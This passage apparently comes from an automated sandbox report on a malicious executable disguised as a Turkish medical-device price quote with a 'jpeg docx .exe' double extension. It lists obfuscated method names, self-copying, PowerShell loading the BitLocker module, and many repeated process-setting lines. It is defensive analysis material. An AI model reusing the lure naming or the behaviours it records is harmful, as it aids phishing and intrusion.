                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, Ihj2xGWwQDT4qEXmeq.csHigh entropy of concatenated method names: 'UMl4rljy4d', 'PKV4JAHpbf', 'XRe4qGrFi8', 'J654WXxBdZ', 'uV64FMfgdR', 'hTF42J9muu', 'fs84T0YC54', 'jBE4tq8PxH', 'QJT4c9jxR4', 'wyt4gkrdyO'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, JAAXus72oe4KCcZgU6.csHigh entropy of concatenated method names: 'ToString', 'Npk2LYvjqT', 'Rs22IioTFw', 'cBE2CEBryx', 'Waq2GqypiD', 'bgf2m7eT5h', 'JVt2hKyGmS', 'vMF2Po45KM', 'sQg2E0yeib', 'Hib29RM2Xg'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, aVnvd7YQLp1MKjqRGF.csHigh entropy of concatenated method names: 'CcvTo7vR4S', 'XjcTiOZF0I', 'ToString', 'JMmTsS8ykD', 'xLATAyWVdf', 'iUlT4xLJHD', 'hRjTaLjcO2', 'EZvTx7eFWL', 'KyTTyIGf9M', 'LaeTUcnrSe'
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ drc medikal cihaz sipari#u015fi jpeg docx .exe
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ drc medikal cihaz sipari#u015fi jpeg docx .exe
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ drc medikal cihaz sipari#u015fi jpeg docx .exeJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tibbi20_ drc medikal cihaz sipari#u015fi jpeg docx .exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
